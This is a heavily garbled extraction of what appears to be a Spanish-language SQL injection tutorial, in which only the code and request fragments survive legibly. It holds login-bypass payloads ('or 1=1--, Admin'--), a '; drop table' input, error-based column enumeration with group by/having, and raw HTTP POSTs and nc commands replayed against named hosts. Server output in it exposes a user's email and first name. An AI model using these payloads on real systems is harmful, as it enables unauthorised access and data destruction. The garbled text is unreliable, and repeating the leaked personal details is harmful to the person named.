!

!
#$%&

"
'
" * +"

(
,# .
/
"0#$%
'
"
, *
) 1 % )" + !
"
, *
, ")
- **
2 #$% '
"- " "
3 #$% 4
)

?
@
B
C

) 5
,
! )
%"
"
5 "
67"
* 8*
"
. 5 9 ", #
:)
*
*
#.
8<
+
"
" )
>; ) 5
4 '
" ;
4 #
!
4 ! ', *
#$% 4
: "'
"
' "
"A
"
*
"+%
"'
; "
A " "' ) "
5.
"

""

) " " "

! 6 . "
#$% 4
+ ;7

"

/
;
" =

"
"
" .>
", "
"
" 8<
" "

"

"

"

"

"
"

"

)4
" 7

# )

"

"

+ =
)
& " +

. "
!
.
7

&
"
"+

"

9
&
"

" "
. "
( "

&

D
"

9 &

"

"

*
6

"

6
.
"
" 6 ( ""
" 4 ""
"
7<
"
) "

"

" "

"

&"
"
"& "=
. (( #

2
;

" "
"

*
5
"

.
"

6 " .

"

"

" 6
"

&

"
(

"

")

* 9

"

7 " 6 (&
. 4 #$%&
" "
" "

" *

"

"

"

!% & '
5 *
"
D
C 2
.
6 " .
'
"
* 9
"
" 9 ( " ) 4
&
"
* )
4 "
"
%
#8$ 8%
*
*
&
!

% .
. =
4 " " "
"
+&

"& +

"

D "

"

"
&
.

"

)
" "

(
&
"

"

"
)4
"

) 4 )
6
9
"

( )
"

+
8 . "
6 7 "
6 " . "&

"
&

"

>#

"
"
) "
"
9
. 4 #$% " 6
E#+) " & :
+
"
51#
CB@ +
"

9
"

.& 9
+" " ")

"

"

"
. 4
"& 9

"
") " "
.

"

4
"
. 4
+ % . . >
*
6
D
C &
#8$ 8%
#$% E#
$ + % . . F

" D "
,-

&

9
9

+ =
*

<F
#: * "
" 6"
.=
.
"
. 4
4
"
6 "
. 4 "
"
"

*
CB
" #$%BC + #$%C &
"
6
"

"
"
6

.
"
"

"

"
"

"
&

"
"
)
6 "

"

>!
#$%>
"
9
4 "
) )
"
6
"
" . "
4 " "=
9
"
#$%2
.
6
"& 9
"
+
6 6 "
6
. 4

(
) * # +,
$ ( " " "
"
" ) "
"
" 9
- +
" *&
) 4 ) 4
"
"
9 " =
" "
=
,:# !
9
"&
9
" *
"
& " )
) 4
9 "
6 "
2
G
" E,
.
*
&
" 6 "
"
"
"
""
F&
" *
) "
D= " " )
" ) :# & " "
" )
"
)
"
.
" 6
"
!'
"
"
%51

3
5

) &
( ) "

"C &
9 "
& )
9
. )
"
6"
9
4
& "
9
" )
*
" . =
"
6 6 "
# &
)
" 6 "
2F
" 9
" *
9
"
)
:# 2
%

"
)
7

" 9
" ") "

) "
"
9

"

8
""

:#
"
6 &

6
'

"
9

&

- "
*

"
"

"

, "
"
6 "6 "
"
#$% @

&
"
"

.
"

"

"
"

"
.
"

" "&
"
"&

"-

.#

'
*

"

" .

) =
.

9
6 "& +

9 6
"

"
"

" .
)

"

"

#+) "
:#

+
9

"
" 1;& +
" *
0 "
"

" * #$%& " *

9 ( " .
CC?
"
"9
.
)
"

#0#$%& ) 4
&
"
"

F&

"

"

"
6 "
#$%
.

&

"
" *

)
-

6 "
)
" 1;> H "
D CC2

"
&"
"
G

&

#+) "

)=

" "

"

E#$%

6 "

"

.
"
"

) "

" 1;

67"

"

CCB
.
)
9
9 " )
" - "
9 "
. "
" .
" "

D CC
=
" * #$% # 6 3 *
( "
"

) >
( =

& +
9
=

( )
.
"9

"

.
6
, "
G

&

"

" *

"

"

"

:#

" )

7"
"
"
&"
*
*
"9
" *&
2
G
" 1;

" .
"
9
"
"
E!
9
) 4 =

"

" * #$% " 6 "

&
"
I)
&
"
" )
.
( #$% # 6
&
"6
)
"
"
&
"
" "
"
6 4 ""
&
9
"
"
"
"
4
6
" "
=" "

*
9
9
#$% # 6

& "
" "
"

"
""
<

" *&
*
"
"& "
" "
"
.

+
) "

"

?
# )
4
)6

")
& *

" "
) =

+
"
" #$% )
" &
"
"
) "
"
. 9
.
&
"9
"
"
&
"9 &
"
)
"
) 4
"
E' "
" "
"
#0#$% # 6 & 9
"

)
" ) 4

.
&

"

"

J
6"

8
6

"

"

"
)

&
"

"
.

"
"

"
.
)4

"

%#

"
&
"

6 &

.
"
"
" #0#$%& "
" "&
9

8
"
>#5> +
"
8
)
<

"

#$%

9
"
#0#$% 9
" 9 "

"

"

5
E8"
# 6 &
5

) "

+ )
"

.
=

<

<

6 "
"
""

&

"

9
(

) "

+*

"

"

"

"
" .

) " "

" I
+
) 4

&

"
&
*

"

6
#0#$% # 6 &
""
6
"
"

1 % )"

+ =

"

"

"
"

"& ) = "
4 "
"
) 4
"

"
"

"

"
)7
&

" E#51& 5
; M& !N #!N& ;'!&
(
9
" 9 "
"
& "
" " ;'! ! + 1
!
"

&

"

"

+
F

*
4
4

"

"
"

"

"

"&
.

"

"

)
" )
"9

"

9
.
"
= &
9
(.
"
"6
4 " EIF
"
) "
" "&"
6 . "&
"
4

"

"6
"

".
" *

.
"
> > EKKF

"
"

"

"

6
7

"&
+ " 6

""
"*

( 1
( * $#
#0#$%
6
L"&
.
"
"

"

#0#$%

"
#5 "
"
"
<
"

"

") "
" "

;
"
"

"
"

"

"
&
" 6
;'! 332
.

"
"

" 9
"

#0#$%
.

)9
#0#$%

*
6 "
6 #$% E!
4
7
& "
6
"&
"6
)

" "

=
#5

"
9

""

> >F "

"9 6

#$%
)7

"&
;:,:#

"
"

" D "
"
.
"

"
"

"
"

"

"
"

) "

" *
"
"

+ (
&
,#))
;
, 6
% *
#$% # 6 > O#$% # 6
"*
"
- ** "
"
" > 8"
9
"
" *
6
P

&
,!

"
)
<
" "6

"

"

"

"
+"

"

")

"
"

"

"
"
)

!
" Q
" Q
" Q .

"

<

"

"

"
"

&

"

"
) **
#$%&
>
M . 8< " G
) **
" )
"
>" 6Q
* EF>

""

Q M9
Q
"
Q <
Q" "9 "
Q"9 .

6= "

&

"
")

")

" < =
> E #-1 B303B 022CB0@F
)

<
<
<
<
<
<

"

6 "&
"

"
"

"

"

# )
*
"
"

9
*

"
#$% # 6

9
)

". *

>;
! *
" "
, ")
1: < "
" + "

"
"

"&

"

"
+

"

>

M . 8< "
" 9

Q
Q"
Q "
Q

" "
6

"
<
<
<
<

"
6)

-"""
" Q "
" Q
"
+

+
+

""
"

>&
"

G
(

"

"2

% &

"

"
"
6
"
"

)
& #$% "
*
" <"
"
"
:
& ; " 0#$%
"& < "
.
"
& "
" "
.
"
% &
/ 51;
8H:R8
,81S

+%

++

"&

"
"

"
(

" "
" "
"

6
.

.# .
&
6 " ) "&
" =
) " =
"
" ) " . .
*
"
"

*
#!

.# .
." "

"
"* .
.

"

."

"6
" "
."

"

&
) "
"

J
*

"

*
"

"

"9

) "

"

"

"+

"
)

) "

"
"

"

"

%! # #!
(

A :
G 8 8

(
(

/ : ! -S
5H 1/
: ,8 -S

"

&
.

.
6

"

.# .

+ )

"

"
*

,8%8;8

""

+
(

!,5;8

%! # #!
% "
"
" "

1#8 ;

5
" E!%0#$%

" *F
"

(
+

"

"
"
"

(
8

5%;8

#8%8';

"

(
(
(

% &
' 85;8
, :!

% &

. 4

(
(

"

"
"
*
" ." "9
"
.
"
< "

)
" ."

" 6

"
"
"9
)
" 6
"
" ." ""
"
" =* "
9
) " "*
.
" ." ""
"
"
*

"9

B
3

% &

T
U
TU
TV
UV
V
-8;G881
% R8
1

+
,"

.
.
9

+
(

.
*

"

9
9
9
9
6

"

(
(

"

."

"

) "

"

4 & !

SELECT * FROM Tabla;

E8"
"
6 6

"

"

"

."

"

) >; ) >F

UPADTE Tabla SET password = 'Juajuajua' WHERE user =

'admin'
E8" "
( =
""
"
&
6
F
5
4
"

&
"
"

"

"&

"

"
"

. 4 #$%& "

"

" !
4

"

# )

"

&

"

"

&

6
"

"
#$% "

"
=

& "
"
"

"
"
""

"
4

"

"
"

#$%
&

. *
" )
&

"

&
7

9
"

+
4

"
*

"*

& "
"
6 " 9

+
.

"
9

")

"5
#
#

67
"
H
)
")

" 9
=
"
&

"
'

"

.
8
&

>&
"

"
"

9 "& " .
" >5 9 "
9
*
6 &
"
"9
" #$% )
"&
"

C
"

"

" )

" " =

# )

&

)4

<

"

" )
" .
*
" *
" "
"6 "
"
"
") " " "
" 6

"

9
.

" *

"
"

"
!

.
4
"

"

. 4
. "
)4 6

" &+
"
"

"
) 4
*

( 6!
# )
) "

&

"

"

9
8"
"
4
#$%&

5
+

>#$%
#0#$%&

" *
"

"

"".

"

"
" 8
"

" =

"

*
.

9 .
)4 6

"

>

"
"9

&

" "

J
"

"

&

9
<

"

8"

"
"

"

"

&) 4

"

"
.

&

"
"

"

&

"

#
! 6 . "
#$%

"
"
" 7
.J

.
&

"

.
"

"

0 8*
"
05 9 ", #
0 :)
*
0 8<
+
0'
" ;
,

J
#

9
"
" !

"
"&
& "
6"
<

9 "

"

"
6
+

9
)

7<

". *
"
6
"9

9
. "
&.

"
"*

" ) " "

"9 6
"

+ ""
) "
"
"
" 6
" )

"

4! $ (! &
9
"
" 6
.= "
"
"

"

"

"
"G
"
"

"
5#!

=" " 9
&*
"
<

"
"
" 6
"
<
"
* "& "
".
*
"
" =*
*
# 6 "
) " "
" #0
G
"
9
*

"

"
( "
7<

"
"

"

+
6
"9

(
"
8"

"

= "

"

&

"9
"

"

"
9

"
)

6"
"

"

) "
&

" "
*
" D

:M&
"
" " "
"
"+
8

"

"

"

"

&" "
6

"

"&

"

)
6 (

&
"

"

""

"

"

"

6
)& "
) "

" 6

"

"

"
9
"

" : %
*
"
)
"

&

+ =
) "
"
"

.
.

<

"

.J

6
"

"

" *
9 "
"
"

"
&

" "& "

)

"

)9

"

"
)&
" 6
"& + " )
. "
"

) M.
"
*

"

*
*

"

"

"
6

""
"

"
"

"

"&

)7
;

+ =

6
6

" )
) 4
"

"
6"

) "
"

"
"

"

*
.

) "

<FORM action=logon/logon.asp method=post>

<input type=hidden username=_UserName password=_Password>
</FORM>
8"

* .
9
+

"
J
.

"
"
"

"
. " "

. &) "
" 6
"
"
5#!
"
"
F 8
+
6

"
"

"

&
(

"

. " "
.
5#!
) "
" E!
*
; %& 9
) "
"& .
; % + 6 6
&
*
&

"
. " "
*
6
+
. "=

<
*
) )

select * from users where username = _UserName and

password = _Password
5
*
"

"
"

"
6 "
6 6

"
" "

"
.

"
"II )

&
"
4

(
"
&

"
"= +
"

"

" .
&" .

&
"

&

) )

"
"

<

"
%

"

)
"

"
"

http://www.objetivo.com/libreria.asp?edicion='Noviembre'
!

"
" & "
"
"
" ) +
)
"
"
L1 6
) L " "
"
"
) 4
.
"*
" "
"

%
9
"

=
+

"

"

"

"

"

.= EN,F
)7 " "
6
.
5#! 9
8 "
" &
+
) )
.
)
"
"
"
. 9
*
6 " 6
.
"

select * from numeros_anteriores where edicion =

'Noviembre'
"
#$% >
"

&

"

9
=

>&
.

&

"

) "
" "

"

"

9
.
& "

"

" "*
"
"
"

"
*

"

)
7

"
"

+ " +
"

9
+

) "

#$%
5

"

&
E'

"
" "
F

) "

"
" !

"

% L E'

"

4
&"
+

9
"
)

*
+

F "
"&
"

"

""
" "

) 4

"
" )

L
"

")
+

" * #$% # 6
"
"

*
6
9

"

9
6

"" "

#$%
9

*
"

"9

4
(

" 4
&

"
.

"
"

=
.

"

"

"
" +
&

"

"

"

"
)

"

Usuario : An'gel
Password : 338xD

select * from users where username = 'An'gel' and

password = '338xD'

select * from numeros_anteriores where edicion =

'N'oviembre'
8

) "

"

" " 9 "

#$% # 6 & " 9
.
"

"
" .

" ""
&

"
(

""

"
9

"

"

"

"

username = 'An'
edicion = 'N'
% . & ".
"&
"
"
5

"

9
"

""
8

"

9
"

#$%& *
"

" = "

&

"
67"

" 4
"

"
+

&

"

.
"
4
"
9 9
"
#$% # 6

( &
&
". *

"

"
L5 L + L1L II

9
.

"6"
) "
"+ "
"
*
"
"
(

9
6

"
"

"9

.J

6
"

%& "
" "
&
(

* "

"&
.

"
8" "
"
) "
8
"

*
"
+

"
") " "
"
"

"

6 &
6 6

"

.
) =

& 9
"
"
)7 " ".
9 "
7
"
"
# 6
" . #$%
(
(
6
)
"
E84
"

)4
.

"
.

& " 6
9
" " "
+
) 4
" "
" . &
"
6 "&
" *
"
9

" "
&

) )

"

"
)"

"
"

"
"

"

. "
.
"

.J .

"

"

"

&
7<

)
"
&
<
"
4
9

)7 & "

"

"

" 6
"
"
"
?
>8
# 6
>F
"6 "
9
+
#$%
" 6 )
" " 9
"&
9
) "
" ) 4 + "
(
"
' " '
&
"
) 4 >
. #$%
> EH
B
*
" +
"
"F
9
"
"
*
.
".
"
<

2
1

%
&

'
+!
0

(#)*
,

-.

%
,

123
% &
)
"

&

&
)
+
"
(

"
*
" I

"" "

) "
"
+ =

"
&

"9
""

"" .
)4 6 6
6

"
"

!8 (
.
" 7
"
#$% 4
.
"
9
" " "& 9
; %& 5#!& & "
" " 6 ( 9
# 6 '
" 9
"
)
"&
6
) & "
&
4
& .
&
6
" "*
"

& " > 6

* "6 & " " .
9 &
4
&
) "=
8
"
*

" &
) "
"

)
.
"
*
.

.
>.

. >F

" > )

"6

"

"&
" "& +
"9
.J ) "
E!
" ."
>
>% "
'
">

"

) "
"

"
"

"
" "

;:,5 *
" " 6 (

"
(

&"
.

"
=

&
"

.
.

"
"

"

"&

"

"

" " "

" "

" "
"

9
7

= "

" "6
"
)
" " * " *

"
)
6

& "=

" "
"

"&

.
"

"
+ =

"
.
" 7

&

6
" # )
& 1: )
)
"
"
&
"6
"
"
) E8"
"
" )
6 "+
.
F

+ =

)
. "

"

"

"
. "
"
"
<
#$%
"&
.J "
"
+
) 4
*
" EH > % "
'
">F

" >

"

& "

6
" " 9
)7

">
" )

) "
"

6
"

6=
"> "

*
*

"
"&
+J

" &
.

"

. " =
) "
9 "

3
$

(!

6)

"
"

"

"

"

"

"+

"

" "
* "
6"

"
H 7
"
"
! "
*
=

"

.
"&

"

"
.

#$%
""

"
. I) &
E> L >F
*
" )
6
"

+
"

(!
"

.J
"

"
"

"6"
+
"
9

"

" " "

"
"
; % 5#!&
*
"
"
"
"
9 6
"9
"
"
" 6 "&
. "
# 5 : + !5##G: , "
"
.
5#! 9
)
"
+
6
#$% ; ) 7
=
"
9 *
"
" 6
#$%
"
<""
.
" "
" 4
"

"
6

+ =
)
*

) &
3(
"
& #
" : 0% &
"
" "+
"
.= & ! . "
" " D "
9
6" +
) " <
"
"+*
" " "
"
&
9
4 4 4
)
"
.
"
4 " "
"
"
" "" "
" )
"&
9
"
"& "
. "
"
6"
*
.
5 "
"
"
" &
)
)
*
"&
)
. "
"
+
* "&
" " )
6 " "
"

"
*

"
.

!
6

"
"

. *=
"
"

"

"
"& : 0%

.=

""

$
! .
86
,
*
"
"

"
) &

"

8"

"

* .

<

"

. *=

---- Extracto ------------------------------------------<FORM action=ingreso.asp method=post>

<TABLE cellSpacing=1 cellPadding=3 width=440
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif"

size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto ------------------------------------------!

"

9
.

*
5#! E!
"9

) &"
9 6
"
"
" "
)
.

(
"

" &
) 4

&
" F

. "
(

; %
. " " &
" " "
"
"

"
9

*
+

"

#$% " 6
"6"

"& +

"

"
"&
"

"

select * from users where username = 'Angel' and password

= '338xD'
!

"

"

) "
(

"
"9

"

+
(

""

"

<"
6

9 =

6
)
)

"

*
"

"

4
=

"

"

#$%

"

"
" D

"

"
I :M&
"
+
'or 1=1

"
6

"
.

"

Usuario : 'or 1=1-! ""

L
V W
A 47

"

"&
.

"

select * from users where username = ' or 1=1-- and

password = ' or 1=1--

@
1

"

""
.

"

"
6 6
+ =

<"

"
"

"

" "

"
"6

E
""

"

"

>: > 9 "

"
)
. "
"

&
F&

,
0

Usuario : 'OR''='
Password : 'OR''='
5
4/
'

)
" > "

# )

"

&

"
">&
"
#$%
"&
.
+

"

<

"
(

" .

+
&

#.
""
+

"
6 .

"
4

)4
.

"
& "

"

&
"

6
+
> 00 > E, )
&
#$% 9
.

" "

6 &

.J
"

& "

"

6 "
&

6 4 .
F
"
" "
9 6 .

"
6"
"

"

"&

" " "

*

"

" .
"
>5

>

9
>

<"
> "

Usuario : Admin'-Password : 'or 1=1-8

= &

"

"

"

"

" "

select * from users where username = 'Admin'-- and

password = ' or 1=1-#
.
8
E'
6

"

"= + " .

"

&

"6"

"
9

4
) 6

F
"

"
+

&

) )

"
"
">L>
" + > 00 > E, ) /
F
"
< "&
" )

"

"

"

" > "

"

">
"

) 4)
5 "
#$%
6 . "
"
"

'
*

+ =

$ 7! .
"
+
" )

"
"
.
"

"&
9
6

"

"

"
*
"

) 4
"
" 9
6

" *

"
6 .

.
""
5
6

"

"
>

"

9 "
<
+

"
" .
""

"
6
"

&

"

)
"
9 D

"

(
)
* "

)
)

"
"

"

<
"

" )
9
" .9

&

"

"

)
) "&
"

"

.
". *

1
"

"

) "
6 " )4
) "

" )4
"

"

8
". *
6" "

"

%
#
#$% # 6 &
+
"
&
" 6 . "
" 6
& "
>
"
& " ) +>
>
" "
) "
" #$% # 6
"

" " "

"&

"
"9 "

"

"

"

)
"

> 9 "
+
*.
" "
"
"
E'
+ <
" F& " "
"
"
"
" " .
&
. 9
"
" ) " "
"& +
" 9
"
"
&
4
&
"
6
"
" "
"
" 6 " "
"
& " 6 "
4
& "
+ *
"
" )
"
<
6 . &
" "
" .
"

'
;
""
6
##$%#8 H8
<
>< Q
)
"

)Q

"&

"*
. & "
*
"

$ 7! .

"

"

" "
17 !

"

".

& ) 4

! "

"

"
" *
"& +
" *

) "
"
8
4
.J
" " "& "
" " ) "+

B
. 6 9# +
&
% " 9 " , .
# 6
&
"
6"
"
"
"
" E8 "
"
) "
=
"&
4
"
(
+ ( & F
5
9

*
6
9

"

"

"

6
" &6
9
4

" "
)
"

"9
.J
4

"
&
.
" " 6

.
&
+

M
#$%&
"

"

&"
" " D "
" E' =
" 5
9
" 9 "
.
"
" 6

"

&
"

=
8

"

.
"

"6"
"
. 6 9
J
"
" "

)
&
"

"

&
F

&
*
" 9

*
&

&

Usuario : '; drop table usuarios-Password :

#
*

EH

"

) )

)
&

'
6
"

*
>8*

.J
&

9
7

"

> "

&"

"

"
"> "

! 6
&

"

+
) (
, # "
" )
"&

"
"

"

"
&

"

&

"

"9

. "
>F &
"

. "
9

"

"
9

"

"

"
5"= +

6
"

&

.
) = "

&

+
1

67
)

: 3(
! ) )
7
"

) &
#$%

4
"
D

# )

"

"

"
"
.

& 4/
.

!
#&
" *
"
"
"
"
(
& "
" ")
" 9 )
" :,-' :%8 ,4 "
#$% # 6
.
"

9 &

&
"
" "E
)
"6
&
+

"

"
"9
"&
"

)
. "
) "
"
) "

. 7<
"

"

&
( = &
9

"

"

C
"9
1

"

"

"6

) "

&
"

"

"9

) "

! "
"

"
" D

6
6") "
. "

&" "
&+

" 4 " "

"
+

"

6 ("

"&

+*
"

.1)

8
6

"9

*
" "
" 6 (

".
> L > E'
*

"
"

4
#

"

"

"

<

"

"

"
&

"

"

F
"

& 6

"

"

"
" .

Warning: SQL error: [Microsoft][ODBC SQL Server

Driver][SQL Server]Unclosed quotation mark before the
character string '\')'., SQL state 37000 in SQLExecDirect
in php/db_odbc.inc on line 61 Database error: Invalid
SQL: Select * from usuario where (usuario.login='\'')
ODBC Error: 1 (General Error (The ODBC interface cannot
return detailed error messages).) Session halted.
-

&

:)6
%

"

E
2 !
3 8
?
.
1

"9

" <

" * #$%
<
) "
" "
>
)Q )
>F
"
*
)Q )
&
)
) "
"
(
" "
" "> . >

&
"

"

:,-'

"

" 9
"

6 +
:,-' 8

"
)Q

"
"

6"

"
"> "
.

>
*

3
%
)
010.8#* - "3.9$
(")-#)

123

:;<<

----- Fragmento ----------------------------------------<?php

/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
*
Modified by XXXXXXXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class
var
var
var
var
var
var
var
var
var

DB_Sql {
$Host
= "";
$Database = "";
$User
= "";
$Password = "";
$UseODBCCursor = 0;
$Link_ID
$Query_ID
$Record
$Row

var $Errno
var $Error

=
=
=
=

0;
0;
array();
0;

= 0;
= "";

----- Fragmento ----------------------------------------6

"

"
. &"
*

*
A
*
"
)Q )

"
"
"
>" " >
" 6
) " X " + X! ""
"
9
"
( " " "
. "
"6
&
.
" 6
4
*
. 9
& " "& 9
*
9
9 6
"
" + 6
&
"
" .
"
"
.
"
"
<
9
"
" )
E8 "
"
F

:
) &
*
/
:M& 6
"
"
* 6
"
"&
*
+ "
"
"
+
. &
" 9
4
.

"
"
"

"

"

"

"

#$%&
6 "
" 6
"
) "

"
"

!
9

#$%
) "

9
" "

4
)

"
) "

"
.
"

*
"

"

"
"

6
"

"
#$%

"
4

"
&

"

&

"

"
! " 9
6 4 6 "
" )
"
) "
"
#

"6
"
"&

"

"
&

" "
) < 9

"

"

"

(
6

+)

"

"
"

9
"

"

B
"

*
"

7
"
9 D "
<

&

"

" 9
" 6 " " "
;;!
"
)4 6 & "
6 "
<
&
&
".
*

"'
"+%
) 4

9
7

"

<
""

"
"
"
" 6

% E8
"'
".

"

.
" 9
"
;;!

M
"F&
E5 .
. =

6
" "&

"

6 &
"
*

"
(

"

nc -vv www.objetivo.com 80 < sentencias.txt

'
'

"
&

9
)

"
"

8" *

+
" *
" **
*
F&
.
" D " *

"
"
;;!
*
E8 "
" * # +1 &
"
.
"
) )4 6
. "
" E5 .
) " " " F& "
6

"
"

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Angel&txtPassword=Angel
Y
Y
Y
H
. "

>! ""

>

Y
Y
H
*
-

&
"

! "
" "
*

(
*
8
"

. "

""
<

6
"

"
"
+
&
6 6
" ) "
!
"
"

"

*
9

"
7
) 4

!:#; )
<&

"

"

.
" .

+
)

"
)
> L > E'

9
"

"

"
F
&

*
" 6
"

)
"

"
"
E 6 .& .

6
""
(
>
" >
">
#$%&
" *
6
9 #$% E
4
:%8 ,-F )
"
"
"
6
" "
"
"

>

"

)4

H 6
(
"

"

> "
.

" .
" **
) "
9
)

"
4
!:#; 9

> "
"
"
<
"

6
6
" )" 6
6
(

"
)+&

" #$% 9

"
' " "
" *
"
9
< &
"
4
"&
" 4 " *
6 "
" "

" 6=

"

"

"

*
(

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L 6 . V 00 E8
Z
6 .[ Z2, 00F

"

2
1

.
$

"

)*1(
5*'>

!
"

"

)
"

)
"
"

% )
9 6

6"

"". " "

">

>

"
"
"
"

6
!
\
]

5
!
[
0
^
Q
9
6=

"
6
"
"

"

& +6

(
9 "

"

"

Z 0
Z?'
Q

<& "
"
9
"
"

6"

9
"
;;!
"

Z
Z2Z25
[ Z
Z2,
Z '
Z B
Z C
Z28
Z2'

"
- M# "
"

9
"

"

"

"

"

=
"

!:#;&
"

+
'
#
!
+'
, "!
"
8"
#.
.
'
! 7 ""
! 7 ""
+

OO
V
&
E
F
U
T

:MK

6
""

" " "

(
6

6=
"
&+ 6

"
"
"
)

"9

"

nc -vv www.objetivo.com 80 < Injection.txt > result.html

-

"9

)
!

"

"
"

*
"
H

"

9
6"

"
"

9
4

"
*

&
"

""
"

"
"

+
"

"

"

"
" *
"

"

> 6 .>&
"
& "

"

7
)

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
! *

KK "
"
" 4 "
)
) "
E # 5 :#F& "=

"

5
"

"

9
6 6
"
"&
"

6
"
)7

"
9

&
&

"
=

:,-'
(

)
*

) &
" *
< +
(
"
"
"
"
"
6 !:#;

"

" )" 6 9
#$% # 6
" 6 6
*
"
"
.
" E " ,F

"
"

)
.
= &
*
"
# 5 :#

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-&txtPassword=Angel
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
H
+
L.
)+ "
" " , 6 . V 00
% .
"

"

&6

"

".

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select

list because it is not contained in an aggregate function

and there is no GROUP BY clause.
/Login.asp, line 85
6 (
"
" 6 (
+

"
"

#.

"

"
> . " >
> 6 >

"

&

" 9
"
# 5 :#&

.= & "

"

" 9
" )

"

>.
"

)+>
"

"
# 5 :#
"
"&
"
+
8" " =

"

> 6 .>

" )
,

"

)
*
"

"

"+
"

'group by usuarios.UserID,usuarios.UID having 1=1-#!

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
*

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1
#!

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1-#!

HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date:

Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23
GMT Connection: close Location: PaginaPersonal.asp
Content-Length: 139 Content-Type: text/html Set-Cookie:
xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US
ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun,
16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private
Object Moved
This object may be found here.
:M
"

9 =&

" )" 6
"
+
)
".
> "
"8
> 8
9
" 9 & )
" .
*
)
" .
"
>
>
"
( "
#8%8'; .
E/
"1
F A=4 " 9
"
" !:#; ;;! 1: "
&"
9
"
" "
6
.
"
" "
"
) "
"& 4
6 9
#$%
6

+
E8"
" L.
6 . V 00F
,
*

"

)+
&
"
"

&

)
9

"
"

"

,& "

"

9
"
"
"
"

,& "
&

"
"

"
"

" "
" "

(
'

"

"
"

"1

) & "
*

"8
"

) &

" "
"" . "
9 ;:,:# "
"
#8%8'; .
&
"
"&
"
"
#8%8';
"
+ 9
*
" II 6
"
4
< " #
" "
.

SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x

AND campo5=y

(
)
=
" ) =
.
*
"+
)

7
"

"
"

E8"
"
>& >
<"
>
?> E, *
"
>#8%8'; _ A : ` a>
"
"
"
"
7
F "
(
. "
"
) "

>

>.
)+> + > 6 .>F "
> + >
2>&
"
9
"
="&"
* )
" "
"
"
"

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
